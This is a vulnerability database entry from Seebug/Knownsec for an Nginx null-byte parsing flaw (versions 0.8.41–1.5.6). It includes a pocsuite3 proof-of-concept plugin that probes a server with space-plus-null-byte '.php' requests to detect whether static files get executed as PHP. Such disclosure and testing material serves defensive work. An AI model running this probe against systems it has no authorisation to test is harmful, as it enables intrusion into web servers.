Nginx Blank Null Byte 代码执行漏洞

基本字段

漏洞编号：: SSV-62529

披露/发现时间：: 2013-11-19

提交时间：: 2013-12-02

漏洞等级：

漏洞类别：: 代码执行

影响组件：: Nginx
(漏洞影响:,Nginx 0.8.41-1.5.6)

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0KB

共 0 兑换了

PoC (pocsuite 插件) (pocsuite3 插件)

贡献者 Knownsec 共获得 0KB

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ import re from urllib.parse import urljoin, urlparse from pocsuite3.api import Output, POCBase, register_poc, requests class DemoPOC(POCBase): vulID = '1122' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2013-11-19' createDate = '2013-11-22' updateDate = '2013-11-22' references = ['http://mailman.nginx.org/pipermail/nginx-announce/2013/000125.html'] name = 'Nginx Blank Null Byte 代码执行漏洞 POC' appPowerLink = 'http://www.nginx.org' appName = 'Nginx' appVersion = '1.5.6#' vulType = 'Code Execution' desc = ''' Ngnix在遇到空格时，便跳过对\0字符的检测，从而绕过之前发现\0便抛出NGX_HTTP_PARSE_INVALID_REQUEST的错误，使得之前\0又重新起作用。 ''' samples = [] install_requires = [''] def _verify(self): result = {} r = requests.get( self.url + r'/the_file_that_should_never_exist_on_server.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42') if r.headers.get('Content-Type', '') == 'image/gif': return self.parse_output(result) req = requests.get(self.url) Server = req.headers.get('Server', None) if not Server: return self.parse_output(result) if Server.split('/')[0].lower() != "nginx": return self.parse_output(result) content = req.text re_result = re.findall(r'src="?(.*?\.(ico|jpg|gif|png|bmp|js))"?', content, re.I | re.M | re.DOTALL) if not re_result: re_result = re.findall(r'href="?(.*?\.(css|rar|zip|txt))"?', content, re.I | re.M | re.DOTALL) check_url = self.url + '/robots.txt' if re_result: if not re_result[0][0].startswith('http://'): check_url = urljoin(self.url, re_result[0][0]) else: if (urlparse(re_result[0][0]).netloc.split(':')[0] == urlparse(self.url).netloc.split(':')[0]): check_url = re_result[0][0] else: return self.parse_output(result) check_url = "%s %s%s" % (check_url, chr(0), 'y.php') response = requests.get(check_url) cur_url = response.url if response.headers.get('Content-Type', '') == 'text/html' and check_url == cur_url: check_url = "%s%s" % (check_url, r'?=PHPE9568F34-D428-11d2-A769-00AA001ACF42') response = requests.get(check_url) if response.headers.get('Content-Type', '') == 'image/gif': result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = check_url return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() register_poc(DemoPOC)

共 0 兑换

参考链接

http://mailman.nginx.org/pipermail/nginx-announce/2013/000125.html

解决方案

临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

基本字段

来源

漏洞详情

PoC (pocsuite 插件) (pocsuite3 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

Nginx Blank Null Byte 代码执行漏洞

基本字段

来源

漏洞详情

PoC (pocsuite 插件) (pocsuite3 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定